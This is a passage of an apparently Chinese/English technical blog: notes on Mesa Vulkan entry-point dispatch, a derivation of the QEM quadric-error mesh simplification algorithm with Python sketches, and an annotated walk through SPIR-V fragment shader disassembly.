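The fallback behaviour can be sketched with plain dictionaries, with None standing in for an undefined weak symbol. The function below is loosely modelled on the idea of filling a dispatch table from entrypoint tables with an overwrite flag; its name, the Foo/Bar entry points and the two tables are all hypothetical and are not Mesa's generated code.

```python
def dispatch_table_from_entrypoints(table, entrypoints, overwrite):
    """Fill `table` from `entrypoints`; None models an undefined weak symbol."""
    for name, fn in entrypoints.items():
        if fn is None:
            continue  # the driver did not define this entry point
        if overwrite or table.get(name) is None:
            table[name] = fn
    return table

# Hypothetical stand-ins for driver-specific and common implementations.
def radv_Foo():
    return "radv"

def vk_common_Foo():
    return "common"

def vk_common_Bar():
    return "common"

radv_entrypoints = {"Foo": radv_Foo, "Bar": None}
common_entrypoints = {"Foo": vk_common_Foo, "Bar": vk_common_Bar}

table = {}
dispatch_table_from_entrypoints(table, radv_entrypoints, overwrite=True)
dispatch_table_from_entrypoints(table, common_entrypoints, overwrite=False)
print(table["Foo"](), table["Bar"]())
```

Applying the driver table first and the common table second without overwriting gives the "driver wins, common fills the gaps" result described above.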

`vk_common_xxx`

一些公共入口点，里面包含了：

用 VkFoo2() 实现 VkFoo() 的一些替代逻辑，这样驱动就可以把老的接口删掉，由中间层来做兼容
VkFence，VkSemaphore 和 VkQueueSubmit2 的默认实现
- 当然，也需要驱动提供一些东西，比如 vk_sync_type 的实现

杂记

radv_physical_device: ~~万物之始~~
- radv_CreateDevice
句柄操作：
- VK_DEFINE_HANDLE_CASTS: 定义（带自己搓的类型检查的）转换函数
- VK_FROM_HANDLE：从 VkXXX 转到 Mesa 驱动自己的结构体的句柄

可能是史上最详尽的 QEM 网格简化算法解释 2023-04-11

注：请根据上下文猜测哪些是矢量，哪些是标量，因为作者懒得打了。

简介

QEM 算法（Garland and Heckbert [1998]）是网格简化领域的经典算法。

QEM Original

出现于文章 Surface Simplification Using Quadric Error Metrics 中

Formulation

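Given a mesh $ M = (V, F) $, a vertex pair is considered contractible if it is

an edge of the original mesh, or
a vertex pair $ (v_1, v_2) $ with $ \| v_1 - v_2\| < \epsilon $

For each triangle $ F_i $ with vertices $ v_0, v_1, v_2 $, every point $ v_f $ on $ F_i $ satisfies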

$$ (\vec v_f- \vec v_0) \cdot \vec n = 0 \Rightarrow \vec v_f \cdot \vec n - \vec {v_0} \cdot \vec n = 0 $$

其中面法线 $ \vec n $ 满足

$$ \vec {n} = \frac{(\vec v_1 -\vec v_0) \times (\vec v_2 - \vec v_0)}{\| (\vec v_1 -\vec v_0) \times (\vec v_2 - \vec v_0) \|} $$

空间中任意一点 $ v $ 到平面 $ F_i $ 的距离的平方为

$$ \begin{aligned} d^2(v, F_i) &= \| (\vec v-\vec v_0) \cdot \vec n \|^2 \\ &= (n^\mathbf{T} v - n^\mathbf{T} v_0 )^2 \\ &= v^\mathbf{T} (nn^\mathbf{T}) v - 2 n^\mathbf{T} v_0 n^\mathbf{T}v + (n^\mathbf{T} v_0)^2 \end{aligned} $$

定义

$$ \begin{aligned} {\bf A}_{3\times 3} &= n n^\mathbf{T}\\ d &= -n^\mathbf{T} v_0 \\ \vec b_{3 \times 1} &= d n \\ c &= d^2 \end{aligned} $$

则

$$ d^2(v, F_i) = v^\mathbf{T} {\bf A} v + 2b^\mathbf{T} v + c $$

这个距离平方也可以写成齐次形式

$$ d^2(v, F_i) = h^\mathbf{T} {\bf Q} h \\ \text{where} \ {\bf Q}_{4\times4} = \begin{pmatrix} {\bf A}_{3 \times 3} & b_{3 \times 1} \\ b^\mathbf{T} _{1 \times 3}& c_{1 \times 1} \end{pmatrix} \ \text{and} \ h= \begin{pmatrix} \vec v \\ 1 \end{pmatrix} $$

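So for every plane $ F_i $ we can define a quadratic form $ Q_{F_i}(v) = h^\mathbf{T} \mathbf{Q} h $, which is the squared distance from an arbitrary point $ v $ to that plane.

For a vertex $ v $, the sum of squared distances from it to all of its adjacent faces can be written as $ \sum_{i \in \operatorname{neigh}(v)} Q_{F_i}(v) = (\sum_{i \in \operatorname{neigh}(v)} Q_{F_i})(v) $, so the per-face quadrics can simply be added together.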
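As a numerical check of the definitions of $ {\bf A} $, $ b $ and $ c $, the following sketch builds the quadric of a triangle's plane and evaluates it. It uses plain Python lists instead of a linear algebra library, and all function names are illustrative.

```python
import math

def sub(a, b):
    return [x - y for x, y in zip(a, b)]

def dot(a, b):
    return sum(x * y for x, y in zip(a, b))

def cross(a, b):
    return [a[1] * b[2] - a[2] * b[1],
            a[2] * b[0] - a[0] * b[2],
            a[0] * b[1] - a[1] * b[0]]

def plane_quadric(v0, v1, v2):
    """Return (A, b, c) such that d^2(v) = v^T A v + 2 b^T v + c."""
    n = cross(sub(v1, v0), sub(v2, v0))
    length = math.sqrt(dot(n, n))
    n = [x / length for x in n]          # unit face normal
    d = -dot(n, v0)                      # d = -n^T v0
    A = [[n[i] * n[j] for j in range(3)] for i in range(3)]
    b = [d * x for x in n]
    return A, b, d * d

def add_quadrics(q1, q2):
    (A1, b1, c1), (A2, b2, c2) = q1, q2
    A = [[A1[i][j] + A2[i][j] for j in range(3)] for i in range(3)]
    return A, [x + y for x, y in zip(b1, b2)], c1 + c2

def eval_quadric(q, v):
    A, b, c = q
    Av = [dot(row, v) for row in A]
    return dot(v, Av) + 2 * dot(b, v) + c

q_z0 = plane_quadric([0, 0, 0], [1, 0, 0], [0, 1, 0])   # the plane z = 0
q_z1 = plane_quadric([0, 0, 1], [1, 0, 1], [0, 1, 1])   # the plane z = 1
print(eval_quadric(q_z0, [0.3, 0.2, 2.0]))               # squared distance to z = 0
print(eval_quadric(add_quadrics(q_z0, q_z1), [0, 0, 2])) # sum over both planes
```

Adding the two tuples component-wise is exactly the "sum of quadrics" used for a vertex with several adjacent faces.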

Framework

QEM 算法的框架如下：

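Each vertex $ v_i $ is assigned a Q matrix as described above: $ Q_{v_i} = \sum_{k \in \operatorname{neigh}(v_i)} Q_{F_k} $
When the pair $(v_i, v_j)$ is contracted to $ v' $, the cost of the contraction is defined as $ Q(v') = (Q_{v_i} + Q_{v_j})(v')$; at every step the pair with the globally smallest cost is contracted
- How is $ v' $ chosen? There are two schemes, Optimal Placement and Subset Placement (below, $ {\bf A}, b, c $ are the blocks of $ Q_{v_i} + Q_{v_j} $):
  1. (Optimal Placement) when $ {\bf A} $ is invertible
    
    Setting $ \frac{\partial}{\partial v}(v^\mathbf{T} {\bf A} v + 2b^\mathbf{T} v + c) = 2{\bf A}v + 2b = 0 $ gives $ v_\text{optimal} = -{\bf A}^{-1} b $
  2. (Subset Placement) when $ {\bf A} $ is not invertible, choose whichever of the two endpoints or the midpoint has the smallest edge loss
Update the contracted vertex $ v' $

There are two ways to read this update step. The first is to recompute the Q matrix of $ v' $ from its adjacent faces exactly as in the initial computation (which makes the method completely local). The second is that merging two vertices also merges their Q matrices.

The paper follows the second reading, as can be seen from its remark about implicitly tracking sets of planes. The Discussion section does, however, mention a drawback of this approach: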

Second, the information accumulated in the quadrics is essentially implicit, which can at times be problematic. Suppose we join together two cubes and would like to remove the planes associated with the now defunct interior faces. Not only is it, in general, difficult to determine what faces are defunct, there is no clear way to reliably remove the appropriate planes from the quadrics. As a result, our algorithm does not do as good a job at simplification with aggregation as we would like.

$ Q_{v'} = Q_{v_1} + Q_{v_2} $

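Note that $ Q(v') = (Q_{v_i} + Q_{v_j})(v')$ leads to some double counting: the Q contributions of faces shared by both vertices are summed more than once. The authors state that this repetition has only a limited effect on the result.

The paper cites Donald E. Knuth. The Art of Computer Programming, volume 1. Addison Wesley, Reading, MA, Third edition, 1997 at this point.

I do not quite see how Knuth and the inclusion-exclusion rule relate to improving the result…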
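The placement rule from the framework can be written down directly. This sketch solves $ {\bf A} v = -b $ with Cramer's rule and falls back to Subset Placement when the determinant is close to zero. The tolerance of 1e-12 is an arbitrary assumption and is scale-dependent; a real implementation would more likely test the condition number.

```python
def det3(m):
    return (m[0][0] * (m[1][1] * m[2][2] - m[1][2] * m[2][1])
            - m[0][1] * (m[1][0] * m[2][2] - m[1][2] * m[2][0])
            + m[0][2] * (m[1][0] * m[2][1] - m[1][1] * m[2][0]))

def solve3(A, rhs, eps=1e-12):
    """Cramer's rule; returns None when A is (numerically) singular."""
    d = det3(A)
    if abs(d) < eps:
        return None
    solution = []
    for col in range(3):
        m = [row[:] for row in A]
        for r in range(3):
            m[r][col] = rhs[r]
        solution.append(det3(m) / d)
    return solution

def quadric_error(A, b, c, v):
    Av = [sum(A[i][j] * v[j] for j in range(3)) for i in range(3)]
    return (sum(v[i] * Av[i] for i in range(3))
            + 2 * sum(b[i] * v[i] for i in range(3)) + c)

def contraction_target(A, b, c, vi, vj):
    """Optimal placement if A is invertible, else best of endpoints and midpoint."""
    v = solve3(A, [-x for x in b])
    if v is not None:
        return v
    mid = [(p + q) / 2 for p, q in zip(vi, vj)]
    return min((vi, vj, mid), key=lambda cand: quadric_error(A, b, c, cand))

# Sum of the quadrics of the planes x = 1, y = 2, z = 3: A = I, b = -(1, 2, 3), c = 14.
A = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
b = [-1.0, -2.0, -3.0]
c = 14.0
print(contraction_target(A, b, c, [0.0, 0.0, 0.0], [2.0, 2.0, 2.0]))
```

For the three orthogonal planes the optimum is their intersection point, where the error is zero. With a single plane the matrix is singular and the candidate with the smallest error is returned instead.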

Preserving Boundaries

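When the boundary should not move, first mark every edge as either a normal edge or a boundary edge (a boundary edge does not have to lie on the actual mesh boundary; it is simply an edge that should preferably stay in place).

For an edge $(v_1, v_2)$ marked as a boundary edge, add to the Q matrix of every face adjacent to it a term for the squared distance to the plane that contains the boundary edge and is perpendicular to that face.

Let $(v_1, v_2)$ be a boundary edge and assume an adjacent triangle $ F_i $ has the vertices $v_1, v_2, v_3$. The corresponding boundary plane $ F_{B_i} $ can then be computed as follows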

$$ n_{F_i} = \operatorname{normalize}{ \left((v_2 - v_1) \times (v_3 - v_1) \right)} \\ n_{F_{B_i}} = \operatorname{normalize}{\left( n_{F_i} \times (v_2 - v_1) \right)} \\ \forall v \in F_{B_i},\ \vec {n_{F_{B_i}}} \cdot (\vec v - \vec {v_1}) = 0 \Rightarrow \vec {n_{F_{B_i}}} \cdot \vec v +(- \vec {n_{F_{B_i}}} \cdot \vec {v_1}) = 0 $$

The squared distance to the boundary plane $ F_{B_i} $ is then:

$$ d^2(v, F_{B_i}) = h^\mathbf{T} \mathbf{Q} h \\ \text{where} \ {\bf Q}_{4\times4} = \begin{pmatrix} {\bf A}_{3 \times 3} & b_{3 \times 1} \\ b^\mathbf{T} _{1 \times 3}& c_{1 \times 1} \end{pmatrix} = \begin{pmatrix} n_{F_{B_i}}n_{F_{B_i}}^{\bf T} & (- n_{F_{B_i}} \cdot {v_1}) {n_{F_{B_i}}} \\ (- n_{F_{B_i}} \cdot {v_1}) n_{F_{B_i}}^{\bf T} & (- n_{F_{B_i}} \cdot {v_1}) ^2 \end{pmatrix} \ \text{and} \ h= \begin{pmatrix} \vec v \\ 1 \end{pmatrix} $$

Adding this to the Q matrix of the adjacent face makes it propagate into the Q matrix of every edge in the end.
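A quick way to sanity-check the boundary plane construction is to compute it for a concrete triangle. The sketch below returns the plane as a unit normal and an offset, from which the Q matrix follows exactly as for an ordinary face; the function names are illustrative.

```python
import math

def sub(a, b):
    return [x - y for x, y in zip(a, b)]

def dot(a, b):
    return sum(x * y for x, y in zip(a, b))

def cross(a, b):
    return [a[1] * b[2] - a[2] * b[1],
            a[2] * b[0] - a[0] * b[2],
            a[0] * b[1] - a[1] * b[0]]

def normalize(a):
    length = math.sqrt(dot(a, a))
    return [x / length for x in a]

def boundary_plane(v1, v2, v3):
    """Plane through edge (v1, v2), perpendicular to triangle (v1, v2, v3).

    Returns (n, d) with n . v + d = 0 for every point v on the plane.
    """
    n_face = normalize(cross(sub(v2, v1), sub(v3, v1)))
    n_b = normalize(cross(n_face, sub(v2, v1)))
    return n_b, -dot(n_b, v1)

def squared_distance(plane, v):
    n, d = plane
    return (dot(n, v) + d) ** 2

plane = boundary_plane([0, 0, 0], [1, 0, 0], [0, 1, 0])
print(plane)                                   # the plane y = 0
print(squared_distance(plane, [0.5, 2.0, 7.0]))
```

Both endpoints of the boundary edge have zero distance to the plane, so the extra term only penalises moving a vertex sideways away from the edge.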

Appearance Preserving QEM

出现于文章 Simplifying Surfaces with Color and Texture using Quadric Error Metrics 中

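Continuous vertex attributes can be handled by appending them to the position vector and optimising everything together. This is essentially a generalisation of the original QEM: the distance to a plane becomes the distance to the 2-plane determined jointly by the positions and the other vertex attributes of the triangle's three vertices.

The paper also changes the definition of contractible vertex pairs and restricts them to the edges of the original triangle mesh, because contracting arbitrary pairs turned out not to be reliable enough.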

Our experience has shown that, while greedy edge contraction produces consistently good results on many kinds of models, greedy contraction of arbitrary pairs is not as robust and does not perform as consistently.

Formulation

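Generalise the vertices $ v_i $ of the triangle $ F_i $ above from $ \mathbb{R}^3 $ to $ \mathbb{R}^n $. Three points in $ \mathbb{R}^n $ that are not collinear still determine a two-dimensional plane, and two orthonormal basis vectors $ e_1 $, $ e_2 $ of that plane can be obtained by Gram-Schmidt orthogonalisation: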

$$ \begin{aligned} e_1 &= \operatorname{normalize}{(v_2-v_1)} \\ e_2 &= \operatorname{normalize}{((v_3 - v_1) - (e_1 \cdot (v_3 - v_1)) e_1)} \end{aligned} $$

Then, for $ v \in \mathbb{R}^n $,

$$ \begin{aligned} d^2(v, F_i) &= \| v - v_1 \|^2 - ((v-v_1)\cdot e_1)^2 - ((v-v_1)\cdot e_2)^2 \\ &= (v-v_1)^{\bf T}(v-v_1) - ((v-v_1)^{\bf T}e_1)(e_1^{\bf T}(v-v_1)) - ((v-v_1)^{\bf T}e_2)(e_2^{\bf T}(v-v_1)) \\ &= (v^{\bf T} v - v_1^{\bf T}v-v^{\bf T} v_1 + v^{\bf T}_1 v_1) - \\ & \ \quad (v^{\bf T}e_1 e_1^{\bf T}v -v^{\bf T}_1 e_1 e_1^{\bf T}v - v^{\bf T}e_1 e_1^{\bf T} v_1 + v_1^{\bf T} e_1 e_1^{\bf T} v_1) - \\ & \ \quad (v^{\bf T}e_2 e_2^{\bf T}v -v^{\bf T}_1 e_2 e_2^{\bf T}v - v^{\bf T}e_2 e_2^{\bf T} v_1 + v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= (v^{\bf T} v - 2v_1^{\bf T}v + v^{\bf T}_1 v_1) - \\ & \ \quad (v^{\bf T}e_1 e_1^{\bf T}v -v^{\bf T}_1 e_1 e_1^{\bf T}v - (v_1^{\bf T} e_1 e_1^{\bf T} v)^{\bf T} + v_1^{\bf T} e_1 e_1^{\bf T} v_1) - \\ & \ \quad (v^{\bf T}e_2 e_2^{\bf T}v -v^{\bf T}_1 e_2 e_2^{\bf T}v - (v_1^{\bf T} e_2 e_2^{\bf T} v)^{\bf T} + v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= (v^{\bf T} v - 2v_1^{\bf T}v + v^{\bf T}_1 v_1) - \\ & \ \quad (v^{\bf T}e_1 e_1^{\bf T}v -v^{\bf T}_1 e_1 e_1^{\bf T}v - (v_1^{\bf T} e_1 e_1^{\bf T} v) + v_1^{\bf T} e_1 e_1^{\bf T} v_1) - \\ & \ \quad (v^{\bf T}e_2 e_2^{\bf T}v -v^{\bf T}_1 e_2 e_2^{\bf T}v - (v_1^{\bf T} e_2 e_2^{\bf T} v) + v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= v^{\bf T} ({\bf I} - e_1 e_1^{\bf T} - e_2 e_2^{\bf T}) v + 2(v^{\bf T}_1 e_1 e_1^{\bf T} + v^{\bf T}_1 e_2 e_2^{\bf T}-v_1^{\bf T}) v + (v^{\bf T}_1 v_1 -v_1^{\bf T} e_1 e_1^{\bf T} v_1 - v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= v^{\bf T} ({\bf I} - e_1 e_1^{\bf T} - e_2 e_2^{\bf T}) v + 2(e_1 e_1^{\bf T}v_1 +e_2 e_2^{\bf T} v_1 - v_1)^{\bf T} v + (v^{\bf T}_1 v_1 -v_1^{\bf T} e_1 e_1^{\bf T} v_1 - v_1^{\bf T} e_2 e_2^{\bf T} v_1) \\ &= v^{\bf T} ({\bf I} - e_1 e_1^{\bf T} - e_2 e_2^{\bf T}) v + 2((e_1 \cdot v_1)e_1 +(e_2 \cdot v_1)e_2 - v_1)^{\bf T} v + (v_1 \cdot v_1 - (v_1\cdot e_1)^2 - (v_1 \cdot e_2)^2) \end{aligned} $$

As before, this can be arranged into Q matrix form

$$ d^2(v, F_i) = v^\mathbf{T} {\bf A} v + 2b^\mathbf{T} v + c \\ \text{where}\ \left\{ \begin{aligned} {\bf A}_{n\times n} &= {\bf I} - e_1 e_1^{\bf T} - e_2 e_2^{\bf T} \\ {\bf b}_{n\times 1} &= (e_1 \cdot v_1)e_1 +(e_2 \cdot v_1)e_2 - v_1 \\ c_{1\times 1} &= v_1 \cdot v_1 - (v_1\cdot e_1)^2 - (v_1 \cdot e_2)^2 \end{aligned} \right. $$
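The generalised quadric can be verified numerically in any dimension. The sketch below follows the formulas for $ {\bf A} $, $ b $ and $ c $ term by term, again with plain lists; the function names and the five-dimensional test data are made up for illustration.

```python
import math

def sub(a, b):
    return [x - y for x, y in zip(a, b)]

def dot(a, b):
    return sum(x * y for x, y in zip(a, b))

def normalize(a):
    length = math.sqrt(dot(a, a))
    return [x / length for x in a]

def generalized_quadric(v1, v2, v3):
    """Return (A, b, c) for the 2-plane through v1, v2, v3 in R^n."""
    e1 = normalize(sub(v2, v1))
    w = sub(v3, v1)
    e2 = normalize([wi - dot(e1, w) * ei for wi, ei in zip(w, e1)])
    n = len(v1)
    A = [[(1.0 if i == j else 0.0) - e1[i] * e1[j] - e2[i] * e2[j]
          for j in range(n)] for i in range(n)]
    b = [dot(e1, v1) * e1[i] + dot(e2, v1) * e2[i] - v1[i] for i in range(n)]
    c = dot(v1, v1) - dot(v1, e1) ** 2 - dot(v1, e2) ** 2
    return A, b, c

def eval_quadric(q, v):
    A, b, c = q
    Av = [dot(row, v) for row in A]
    return dot(v, Av) + 2 * dot(b, v) + c

# A triangle in R^5 (e.g. position plus two attributes) spanning axes 0 and 1.
q = generalized_quadric([1, 1, 1, 0, 0], [2, 1, 1, 0, 0], [1, 2, 1, 0, 0])
print(eval_quadric(q, [5, -3, 1, 3, 4]))   # 0^2 + 3^2 + 4^2
```

The three triangle vertices themselves evaluate to zero, which is a convenient invariant to assert in tests.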

Preserving Boundaries

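Carrying the original QEM boundary handling over to $ \mathbb{R}^n $ directly is difficult, because in $ \mathbb{R}^n $ there are many planes that pass through two given points and are perpendicular to a given plane.

A plane in $ \mathbb{R}^n $ is a two-dimensional subspace, and the vectors perpendicular to it now form a "normal space" (the quotient space $ \mathbb{R} ^n / \mathbb{R} ^2 $) of dimension $ n - 2 $. A plane in $ \mathbb{R}^n $ through two points and perpendicular to a given plane $ \iff $ a plane through the two points and a point of the normal space $ \Rightarrow $ there are at least $ n - 2 $ such planes (one per basis direction of the normal space), so the choice is no longer unique

For this reason, the boundary is simply locked here.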

效果展示

0.5 ratio

SPIR-V 初探 (一) - Fragment Shader 2023-03-29

简介

本文主要关注 SPIR-V 1.6。

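The branch, loop and function tests below are mostly carried out inside helper functions called from an OpEntryPoint with the Fragment execution model.

The experiments below mostly use glslang trunk on Shader Playground (the site states that it uses the 2022-09-19 build), with:

Shader stage set to frag
Target set to Vulkan 1.3
Output format set to SPIR-V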

例子

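Learning SPIR-V through examples is quick and easy to follow.

SPIR-V itself is an IR in SSA form, and its instruction format is regular and easy to parse (although everyone uses a library and nobody parses SPIR-V by hand).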
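To show how regular the binary encoding is, here is a minimal sketch of a module walker. It relies on three facts from the SPIR-V specification: the module starts with a five-word header whose first word is the magic number 0x07230203, the first word of each instruction stores the word count in its high 16 bits and the opcode in its low 16 bits, and OpCapability and OpMemoryModel have the opcodes 17 and 14. The function names and the little-endian assumption in words_from_bytes are mine.

```python
import struct

SPIRV_MAGIC = 0x07230203
OP_MEMORY_MODEL, OP_CAPABILITY = 14, 17

def words_from_bytes(data):
    # Assumption: the file is little-endian, as produced on common platforms.
    return list(struct.unpack("<%dI" % (len(data) // 4), data))

def parse_module(words):
    """Split 32-bit words into the header and a list of (opcode, operands)."""
    if len(words) < 5 or words[0] != SPIRV_MAGIC:
        raise ValueError("not a SPIR-V module in host byte order")
    header = {
        "version": ((words[1] >> 16) & 0xFF, (words[1] >> 8) & 0xFF),
        "generator": words[2],
        "bound": words[3],
        "schema": words[4],
    }
    instructions = []
    i = 5
    while i < len(words):
        word_count = words[i] >> 16
        opcode = words[i] & 0xFFFF
        if word_count == 0 or i + word_count > len(words):
            raise ValueError("malformed instruction at word %d" % i)
        instructions.append((opcode, words[i + 1:i + word_count]))
        i += word_count
    return header, instructions

# Header for version 1.6 with Bound = 6, then
# "OpCapability Shader" and "OpMemoryModel Logical GLSL450".
module = [SPIRV_MAGIC, 0x00010600, 0, 6, 0,
          (2 << 16) | OP_CAPABILITY, 1,
          (3 << 16) | OP_MEMORY_MODEL, 0, 1]
header, instructions = parse_module(module)
print(header)
print(instructions)
```

Decoding operands beyond raw words needs the per-opcode grammar, which is where a library such as SPIRV-Tools becomes the practical choice.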

规范文档参考：

Khronos SPIR-V Registry

SPIR-V Unified Specifications

同时推荐用 Shader Playground 来方便直接看到 SPIR-V Disassembly。

In my own tests, OpenAI's GPT-4 is fairly good at decompiling SPIR-V back into GLSL.

Layout

从反汇编结果可以看到，SPIR-V Module 有比较整齐的形式，事实上这些形式是规定好的：Logical Layout of a Module - SPIR-V Specification。

概观

#version 310 es
precision highp float;
precision highp int;
precision mediump sampler3D;

void main() {}

; SPIR-V
; Version: 1.6
; Generator: Khronos Glslang Reference Front End; 10
; Bound: 6                                                  ; Bound; where all <id>s in this module are
                                                            ; guaranteed to satisfy 0 < id < Bound
; Schema: 0                                                 ; Instruction Schema; Reserved, not used for now
               OpCapability Shader
          %1 = OpExtInstImport "GLSL.std.450"
               OpMemoryModel Logical GLSL450                ; Addressing model = Logical
                                                            ; Logical 模式下面，指针只能从已有的对象中创建，指针的地址也都是假的
                                                            ;   （也就是说，不能把指针的值拷贝到别的变量中去）
                                                            ; 也有一些带有物理指针的 Addressing Model 和相应的 Memory Model
                                                            ;   => 留待后文探索
                                                            ; Memory Model = GLSL450
               OpEntryPoint Fragment %main "main"           ; Execution Model = Fragment
                                                            ; Entrypoint = %main (用 OpFunction 定义的某个 Result ID)
                                                            ; Name = "main" (Entrypoint 要有一个字符串名字)
               OpExecutionMode %main OriginUpperLeft        ; The coordinates decorated by FragCoord
                                                            ; appear to originate in the upper left,
                                                            ; and increase toward the right and downward.
                                                            ; Only valid with the Fragment Execution Model.
               OpSource ESSL 310                            ; 标记源语言; ESSL = OpenGL ES Shader Language
               OpName %main "main"
       %void = OpTypeVoid
          %3 = OpTypeFunction %void
       %main = OpFunction %void None %3
          %5 = OpLabel
               OpReturn
               OpFunctionEnd

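Note that the result id %main is defined further down, yet it is already referenced earlier.

For SPV_OPERAND_TYPE_ID, SPV_OPERAND_TYPE_MEMORY_SEMANTICS_ID and SPV_OPERAND_TYPE_SCOPE_ID, an id normally has to be defined (as the result id of some instruction) before it is referenced, except in instructions that allow forward references.

The instructions that allow forward references can be found at source/val/validate_id.cpp:L122 @ SPIRV-Tools and include:

All OpTypeXXX instructions

A long list of others, mainly metadata such as execution modes, Decorate, branches, device side invoke and so on

See the function spvOperandCanBeForwardDeclaredFunction (source/operand.cpp @ SPIRV-Tools)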

简单的函数

函数定义：

#version 310 es

float Circle( vec2 uv, vec2 p, float r, float blur )
{

    float d = length(uv - p);
    float c = smoothstep(r, r-blur, d);
    return c;

}

// skip some lines

SPIR-V 反汇编：

; == 相关定义 ==
%1 = OpExtInstImport "GLSL.std.450"                        ; 引入外部指令集
%float = OpTypeFloat 32
%v2float = OpTypeVector %float 2
%_ptr_Function_v2float = OpTypePointer Function %v2float
%_ptr_Function_float = OpTypePointer Function %float       ; 定义指针类型，指向的变量的 Storage Class 为 Function
%10 = OpTypeFunction %float %_ptr_Function_v2float %_ptr_Function_v2float %_ptr_Function_float %_ptr_Function_float

; == 函数 ==
%Circle_vf2_vf2_f1_f1_ = OpFunction %float None %10        ; 返回值类型 %float，Function Control 类型无
                                                           ; 函数类型 %10 - float (vec2, vec2, float, float)
         %uv = OpFunctionParameter %_ptr_Function_v2float  ; 拿到各个 parameter 的 result id
          %p = OpFunctionParameter %_ptr_Function_v2float  
          %r = OpFunctionParameter %_ptr_Function_float    
       %blur = OpFunctionParameter %_ptr_Function_float    
         %16 = OpLabel                                     ; 一个基本块的开始 (2.2.5. Control Flow)
          %d = OpVariable %_ptr_Function_float Function    ; 定义 float 变量, Storage Class 为 Function 
          %c = OpVariable %_ptr_Function_float Function    ; => 变量可以被 OpLoad / OpStore
         %39 = OpLoad %v2float %uv                         ; 结果类型 %v2float, 装载 %uv 变量的值
         %40 = OpLoad %v2float %p
         %41 = OpFSub %v2float %39 %40                     ; Operand 1 - Operand 2 (%uv - %p), result type %v2float
         %42 = OpExtInst %float %1 Length %41              ; Execute an instruction in an imported set of extended instructions
                                                           ; Set (也就是这里的 %1) is the result of an OpExtInstImport instruction.
                                                           ; 后面的 Set 中的 Instruction 是 “Length”，操作数是 %41
               OpStore %d %42                              ; 存到 %d 变量的存储中
         %44 = OpLoad %float %r
         %45 = OpLoad %float %r
         %46 = OpLoad %float %blur
         %47 = OpFSub %float %45 %46                       ; %r - %blur
         %48 = OpLoad %float %d
         %49 = OpExtInst %float %1 SmoothStep %44 %47 %48  ; SmoothStep(%r, %r - %blur, %d)
               OpStore %c %49
         %50 = OpLoad %float %c
               OpReturnValue %50                           ; 不返回值的话使用 OpReturn
               OpFunctionEnd

函数的 in / out 参数

函数定义：

void inoutTest(in vec2 uv, out float o1, in float i2, out vec2 o2) {
    o2 = uv;
    o1 = i2;
}

       %main = OpFunction %void None %3
          %5 = OpLabel
         %v1 = OpVariable %_ptr_Function_v2float Function
         %t1 = OpVariable %_ptr_Function_float Function
         %t2 = OpVariable %_ptr_Function_float Function
         %v2 = OpVariable %_ptr_Function_v2float Function
      %param = OpVariable %_ptr_Function_v2float Function
    %param_0 = OpVariable %_ptr_Function_float Function
    %param_1 = OpVariable %_ptr_Function_float Function
    %param_2 = OpVariable %_ptr_Function_v2float Function
         %24 = OpLoad %v2float %v1
               OpStore %param %24
         %27 = OpLoad %float %t2
               OpStore %param_1 %27
         %29 = OpFunctionCall %void %inoutTest_vf2_f1_f1_vf2_ %param %param_0 %param_1 %param_2
         %30 = OpLoad %float %param_0   ; 可以看到，就是实现了 %param_0 变量内值的变化
               OpStore %t1 %30
         %31 = OpLoad %v2float %param_2
               OpStore %v2 %31
               OpStore %fragColor %38
               OpReturn
               OpFunctionEnd
%inoutTest_vf2_f1_f1_vf2_ = OpFunction %void None %10
         %uv = OpFunctionParameter %_ptr_Function_v2float
         %o1 = OpFunctionParameter %_ptr_Function_float
         %i2 = OpFunctionParameter %_ptr_Function_float
         %o2 = OpFunctionParameter %_ptr_Function_v2float

         %16 = OpLabel
         %17 = OpLoad %v2float %uv
               OpStore %o2 %17
         %18 = OpLoad %float %i2
               OpStore %o1 %18
               OpReturn
               OpFunctionEnd

分支

#version 310 es

int testIf(float range) {
    int c = 0;
    if (range < 1.0)
        c = 1;
    else
        c = 2;
    return c;
}

// skip some lines

SPIR-V 反汇编：

; == 相关定义 ==
      %int_0 = OpConstant %int 0
    %float_1 = OpConstant %float 1

; == 函数 ==
 %testIf_f1_ = OpFunction %int None %22
      %range = OpFunctionParameter %_ptr_Function_float
         %25 = OpLabel                                    ; 基本块开始
        %c_0 = OpVariable %_ptr_Function_int Function
               OpStore %c_0 %int_0
         %68 = OpLoad %float %range                       
         %71 = OpFOrdLessThan %bool %68 %float_1          ; check if %68 (loaded from %range) < %float_1
               OpSelectionMerge %73 None                  ; Declare a structured selection
                                                          ; This instruction must immediately precede either an OpBranchConditional or OpSwitch instruction. That is, it must be the second-to-last instruction in its block.
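                                                          ; Selection Control = None; a hint (Flatten / DontFlatten) can be given here on whether this branch should be flattened
                                                          ; The Merge Block is set to %73, i.e. the place where the branches rejoin
               OpBranchConditional %71 %72 %75            ; if %71 is true jump to label %72, otherwise to label %75; this ends the basic block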
         %72 = OpLabel                                    ; 
               OpStore %c_0 %int_1
               OpBranch %73                               ; Unconditional branch to %73
         %75 = OpLabel
               OpStore %c_0 %int_2
               OpBranch %73
         %73 = OpLabel
         %77 = OpLoad %int %c_0
               OpReturnValue %77
               OpFunctionEnd

Summary:

OpSelectionMerge
OpBranchConditional
Both basic blocks end with an OpBranch to the merge block

循环

Terminology

Merge Instruction: either OpSelectionMerge or OpLoopMerge, used immediately before the branch instruction that ends a block
Header Block: a block that contains a Merge Instruction
- Loop Header: a Header Block whose Merge Instruction is OpLoopMerge
- Selection Header: a Header Block whose Merge Instruction is OpSelectionMerge and whose terminating instruction is OpBranchConditional
- Switch Header: a Header Block whose Merge Instruction is OpSelectionMerge and whose terminating instruction is OpSwitch
Merge Block: a block that appears as the Merge Block operand of a Merge Instruction
Break Block: a block containing a branch to the Merge Block declared by a Loop Header's Merge Instruction
Continue Block: a block containing a branch to the Continue Target of an OpLoopMerge instruction
Return Block: a block containing OpReturn or OpReturnValue

GPT-4: 在 SPIR-V 中，Merge Block 是一个特定类型的基本块（Basic Block），用于控制流程结构中收敛控制流的位置。当你在 SPIR-V 中使用分支结构（如 if-else 语句、循环等）时，Merge Block 表示在这些分支结构末端的汇合点。

